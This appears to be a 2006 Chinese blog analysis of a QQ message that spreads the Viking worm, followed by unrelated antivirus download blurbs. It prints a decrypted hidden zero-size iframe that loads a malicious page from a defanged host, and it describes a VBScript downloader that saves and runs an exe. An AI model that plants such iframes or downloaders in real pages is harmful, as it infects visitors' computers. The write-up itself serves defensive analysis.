endurer 原创
2006-10-08 第1版
QQ自动发送的信息为:
/--------
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了....
hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387**381/
--------/
点击该链接打开的网页首部有用自定义函数 psw()加密的JavaScript脚本代码。解密后为:
/--------
<iframe src=hxxp://web***1.39***com.org/m***s/mm***.htm width=0 height=0></iframe>
--------/
mm***.htm 的开头为 HTMLShip 加密的脚本程序,分为两个部分:
前一部分 解密后的代码为JavaScript编写,解密后的代码如下:
/--------
<script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script><html>
--------/
后一部分 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web***1.3***9com.org/m***s/mm***1.exe 保存为 %temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法来运行。
Kaspersky 报为 Worm.Win32.Viking.y(http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y)
瑞星报为 Worm.Viking.cx。
分享到:
相关推荐
很好用的免费绿色版杀毒小工具,维金的,我一直使用这个杀毒的,对一些顽固的木马、蠕虫病毒都能杀掉
分别介绍VB入门基础、VB基础控件编程、病毒的启动和原理分析、高级控件在黑客编程中的运用、揭秘黑客对系统的操作伎俩与防御、QQ黑客编程、安全工具的编写、反弹木马的实现剖析和防御、“维金/威金,,综合蠕虫与...
维金病毒是很可恶的,清除也很麻烦,这里搜集到一个专杀工具,受到侵害的朋友们可以试试。除了维金病毒,还可以用来清除其他难以清除的资源,使用简单,用用就知道了。
针对该病毒以及最新变种,用户可以使用最新版...单机用户应检查自己的电脑是否存在共享(可使用杀毒软件木马一扫光=享管理”功能查看),在全盘杀毒后及时关闭所有共享设置,以免再遭病毒侵扰,彻底抵御“威金”病毒。
维金支付清结算及金融账户产品乐视、乐信.ppt
网络-计算机-安全相关
我用过的很好的杀毒软件,胜过卡巴斯基、江民、瑞星、木马专杀等等。 本软件爱你还在不断升级! 杀毒时去掉检测“注册表”一项。 速度很快,效率很高!
bat转化为exe可执行文件软件 该软件将bat文件转化为exe文件 有效的防止了他人查看盗取自己的成果 是新手学编程的必备工具 维金官方编程 www.vking.com.cn
对于用十二烷基硫醇包覆的金纳米微粒,用Langmuir-Blodgett(LB)技术制备了二维金纳米微粒有序阵列。在单纯的硫醇包覆的金纳米微粒形成的LB膜中,由于硫醇分子之间的疏水相互作用,容易导致金纳米微粒的自组织而在...
Autoruns工具.....好东西不必多说。。
4、维金病毒,病症:为Windows平台下集成可执行文件感染、网络感染、下载网络木马或其它病毒的复合型病毒,病毒运行后将自身伪装成系统正常文件,以迷惑用户,通过修改注册表项使病毒开机时可以自动运行,同时病毒...
不用多说,中了威金可不是好玩的,特别是有重要资料的时候,这个就派上用场了!
行业分类-设备装置-大面积二维金属光子晶体结构的飞秒激光直写制备方法.zip
网络柠檬对消费者行为的影响及营销启示,张辉,孟维金,柠檬问题是逆向选择问题在产品市场的表现,它降低了交易的效率。本文通过对相关学者的研究和大量数据的分析发现,网络市场上同样
关于Landweber迭代方法在正则化参数后验选取时的阶数最优性注记,李维金,傅初黎,Landweber迭代方法是求解不适定问题的重要方法,而且当正则化参数为先验选取时,该方法可以达到阶数最优的误差估计,且无饱和效应。
全面查杀熊猫烧香、维金、机器狗、磁碟机、ARP病毒、各类盗号木马; 关键位置保护、程序行为和网络行为监控,让最新的病毒与木马无处藏身; 国内首创应用程序补丁检查并修复,可以在官方正式补丁前直接关闭存在漏洞...
语言:English (United States) 麦莉·赛勒斯·特维金(Amy Colores)和卡特·科尔(Carter Cole)为您带来的每一页都给您带来惊喜